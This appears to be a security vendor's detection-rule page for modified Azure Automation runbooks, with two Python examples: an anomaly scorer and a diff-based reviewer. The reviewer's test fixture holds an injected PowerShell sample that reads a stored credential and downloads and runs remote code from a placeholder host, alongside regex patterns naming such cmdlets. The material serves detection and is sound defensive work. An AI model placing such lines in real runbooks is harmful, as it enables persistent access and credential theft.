
Unexpected Azure API calls indicating Automation runbook modification

ID: azure_automation_runbook_modified_anomaly
Data type: Azure Activity
Severity: Low - Medium
MITRE ATT&CK: TA0003:T1059.009

Description

AlphaSOC detected modification of an Azure Automation runbook via the Microsoft.Automation/automationAccounts/runbooks/write, Microsoft.Automation/automationAccounts/runbooks/draft/write, or Microsoft.Automation/automationAccounts/runbooks/publish/action operations in the Azure Activity log. draft/write changes the unpublished draft; publish/action promotes that draft so the next job runs the new content. Adversaries may modify an existing runbook to inject malicious code or a backdoor, leveraging trusted automation infrastructure to execute unauthorized commands. Because runbooks run on schedules and webhooks without further interactive access, this gives an attacker both persistence and execution within the cloud environment.

Impact

A modified runbook executes with the permissions granted to the Automation account's identity (its managed identity or legacy Run As account), which often spans multiple subscriptions and resources. Attackers may use this to maintain persistent access, steal credentials the account can reach, manipulate data, or pivot to other systems. Because the runbook's name, schedule and owner look unchanged, the modification is easy to overlook.

Severity

Severity   Condition
Low        Unexpected action or ASN
Medium     Two unexpected properties at the same time
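
As an added example, not AlphaSOC's own detection logic, the script below scores constructed Azure Activity records the way the severity table describes: it baselines which runbook operations and source ASNs each caller has used, then raises Low for one unexpected property and Medium for two at once. The per-caller baseline, the IP-to-ASN table and the sample events are assumptions made for the example.

```python
"""Score Azure Activity records for anomalous Automation runbook changes.

Added example, not AlphaSOC's detection code. It models the severity table on
this page: one unexpected property (action or ASN) is Low, two at once is
Medium. Baselines are kept per caller; that choice is an assumption here.
"""
from collections import defaultdict

# Runbook-modifying operations named on this page.
RUNBOOK_OPS = {
    "Microsoft.Automation/automationAccounts/runbooks/write",
    "Microsoft.Automation/automationAccounts/runbooks/draft/write",
    "Microsoft.Automation/automationAccounts/runbooks/publish/action",
}

# Constructed IP-to-ASN table using documentation prefixes (RFC 5737) and
# documentation ASNs (RFC 5398). Activity log records carry callerIpAddress,
# not an ASN, so a real pipeline resolves it with a GeoIP/ASN database.
IP_TO_ASN = {
    "203.0.113.10": "AS64496",
    "203.0.113.11": "AS64496",
    "203.0.113.12": "AS64496",
    "198.51.100.7": "AS64497",
}


def asn_for(ip):
    return IP_TO_ASN.get(ip, "UNKNOWN")


def build_baseline(events):
    """Per-caller sets of runbook operations and ASNs seen in the baseline window."""
    baseline = defaultdict(lambda: {"ops": set(), "asns": set()})
    for ev in events:
        if ev["operationName"] in RUNBOOK_OPS:
            entry = baseline[ev["caller"]]
            entry["ops"].add(ev["operationName"])
            entry["asns"].add(asn_for(ev["callerIpAddress"]))
    return dict(baseline)


def score_event(ev, baseline):
    """Return (severity, reasons); severity is None when nothing is unexpected."""
    op = ev["operationName"]
    if op not in RUNBOOK_OPS:
        return None, []  # reads and other operations are out of scope
    known = baseline.get(ev["caller"], {"ops": set(), "asns": set()})
    asn = asn_for(ev["callerIpAddress"])
    reasons = []
    if op not in known["ops"]:
        reasons.append(f"unexpected action {op} for {ev['caller']}")
    if asn not in known["asns"]:
        reasons.append(f"unexpected ASN {asn} for {ev['caller']}")
    if not reasons:
        return None, []
    return ("Medium" if len(reasons) == 2 else "Low"), reasons


def _event(cid, caller, op, ip, ts):
    # Trimmed Azure Activity record; real records carry many more fields.
    return {"correlationId": cid, "caller": caller, "operationName": op,
            "callerIpAddress": ip, "eventTimestamp": ts}


RB = "Microsoft.Automation/automationAccounts/runbooks/"
DEVOPS = "devops@contoso.example"

# Constructed baseline window: one operator maintaining runbooks from one ASN.
BASELINE_EVENTS = [
    _event("b1", DEVOPS, RB + "draft/write", "203.0.113.10", "2024-05-01T09:00:00Z"),
    _event("b2", DEVOPS, RB + "publish/action", "203.0.113.10", "2024-05-01T09:01:00Z"),
    _event("b3", DEVOPS, RB + "write", "203.0.113.11", "2024-05-02T14:20:00Z"),
    _event("b4", DEVOPS, "Microsoft.Compute/virtualMachines/start/action",
           "203.0.113.10", "2024-05-02T14:25:00Z"),
]

# Constructed events to score: an expected edit, a publish from a new ASN, a
# new caller from that ASN, and a read that the detection must ignore.
NEW_EVENTS = [
    _event("c1", DEVOPS, RB + "draft/write", "203.0.113.12", "2024-05-10T08:00:00Z"),
    _event("c2", DEVOPS, RB + "publish/action", "198.51.100.7", "2024-05-10T22:13:00Z"),
    _event("c3", "svc-backup@contoso.example", RB + "write", "198.51.100.7",
           "2024-05-10T22:15:00Z"),
    _event("c4", DEVOPS, RB + "read", "198.51.100.7", "2024-05-10T22:16:00Z"),
]


def run_detection(events=NEW_EVENTS, baseline_events=BASELINE_EVENTS):
    """Map correlationId to severity for every event that scores."""
    baseline = build_baseline(baseline_events)
    alerts = {}
    for ev in events:
        severity, reasons = score_event(ev, baseline)
        if severity:
            alerts[ev["correlationId"]] = severity
            print(ev["correlationId"], severity, "; ".join(reasons))
    return alerts


if __name__ == "__main__":
    run_detection()
```

A brand-new principal touching runbooks scores Medium under this baseline by construction, which is usually what you want; if service principals are rotated often, key the baseline on the application or role instead of the caller string.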

Investigation and Remediation

Review the runbook's modification history and compare both the current published content and the draft with the last known good version to identify exactly what changed. In the Activity log, check the caller, callerIpAddress and time of the write, draft/write and publish/action operations, and confirm with the user or team that the change was authorized. Examine the added code for suspicious commands, encoded or obfuscated payloads, download-and-execute patterns, and connections to hosts the runbook has no reason to contact. If the change was unauthorized, restore the runbook to a known good version and republish it, review any jobs that already ran the modified code, check whether schedules or webhooks were added alongside the change, and investigate the modifying account for compromise.
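
One way to do the version comparison and code review step, as an added example that is not AlphaSOC tooling: diff the known good version against the current one and flag only the added lines that show the indicators named above (credential access, encoded payloads, download-and-execute, outbound connections to hosts the runbook is not expected to contact). The runbook bodies, regex patterns and host allowlist are constructed for the example and need tuning per environment.

```python
"""Triage the diff between two runbook versions for suspicious additions.

Added example, not AlphaSOC tooling. Both runbook bodies below are constructed;
the indicator patterns and the allowlist of expected hosts are assumptions to
tune per environment.
"""
import difflib
import re
from textwrap import dedent
from urllib.parse import urlparse

# Indicators in added lines that merit a closer look (PowerShell runbooks).
SUSPICIOUS_PATTERNS = {
    "base64 decode": re.compile(r"FromBase64String|-EncodedCommand", re.I),
    "dynamic execution": re.compile(r"\bInvoke-Expression\b|\bIEX\b", re.I),
    "download": re.compile(
        r"Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient|\biwr\b", re.I),
    "credential access": re.compile(
        r"Get-AutomationPSCredential|Get-AzKeyVaultSecret", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\")]+")
# Constructed allowlist: hosts this runbook is expected to talk to.
EXPECTED_HOSTS = {"management.azure.com", "login.microsoftonline.com"}


def indicators_for(line):
    """Names of indicators found in one line, unexpected hosts included."""
    found = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(line)]
    for url in URL_RE.findall(line):
        host = urlparse(url).hostname
        if host not in EXPECTED_HOSTS:
            found.append(f"external host {host}")
    return found


def review_change(old_text, new_text):
    """Return (new_line_number, indicator, line) for every flagged added line."""
    old_lines = old_text.splitlines()
    new_lines = new_text.splitlines()
    matcher = difflib.SequenceMatcher(None, old_lines, new_lines)
    findings = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag not in ("insert", "replace"):
            continue  # unchanged or removed lines cannot add a backdoor
        for j in range(j1, j2):
            for indicator in indicators_for(new_lines[j]):
                findings.append((j + 1, indicator, new_lines[j].strip()))
    return findings


# Constructed known good version: starts the VMs in a resource group.
OLD_RUNBOOK = dedent("""\
    param([string]$ResourceGroupName)
    Connect-AzAccount -Identity | Out-Null
    Get-AzVM -ResourceGroupName $ResourceGroupName | Start-AzVM
""")

# Constructed modified version: the same job plus injected lines that read a
# credential asset, decode a blob, and download-and-execute from an outside host.
# The final line is a benign change that must not be flagged.
NEW_RUNBOOK = dedent("""\
    param([string]$ResourceGroupName)
    Connect-AzAccount -Identity | Out-Null
    $cred = Get-AutomationPSCredential -Name 'sqladmin'
    $blob = 'QUJD'
    $payload = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($blob))
    IEX ((New-Object Net.WebClient).DownloadString('http://203.0.113.50/a.ps1'))
    Get-AzVM -ResourceGroupName $ResourceGroupName | Start-AzVM -NoWait
""")


if __name__ == "__main__":
    for line_no, indicator, text in review_change(OLD_RUNBOOK, NEW_RUNBOOK):
        print(f"line {line_no}: {indicator}: {text}")
```

Pull the published content and the draft separately: a draft/write without a following publish/action means the live job is still running the old code, while a publish/action from a draft you never saw means the change is already live. Review both against the last known good version.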

Known False Positives

  • Routine updates to automation scripts by administrators
  • DevOps teams modifying runbooks as part of normal workflows
  • Scheduled maintenance or improvements to existing automation